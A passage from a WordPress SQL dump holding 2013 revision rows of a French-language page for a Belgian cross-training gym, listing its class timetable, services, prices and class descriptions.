underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:26:59', '2013-07-03 16:26:59', '', 11, 'http://www.crosstrainingcenter.be/?p=163', 0, 'revision', '', 0),
(164, 1, '2013-07-03 16:27:40', '2013-07-03 16:27:40', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td class=\"ttitre\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:27:40', '2013-07-03 16:27:40', '', 11, 'http://www.crosstrainingcenter.be/?p=164', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(167, 1, '2013-07-03 16:30:33', '2013-07-03 16:30:33', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:30:33', '2013-07-03 16:30:33', '', 11, 'http://www.crosstrainingcenter.be/?p=167', 0, 'revision', '', 0),
(168, 1, '2013-07-03 16:32:37', '2013-07-03 16:32:37', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de 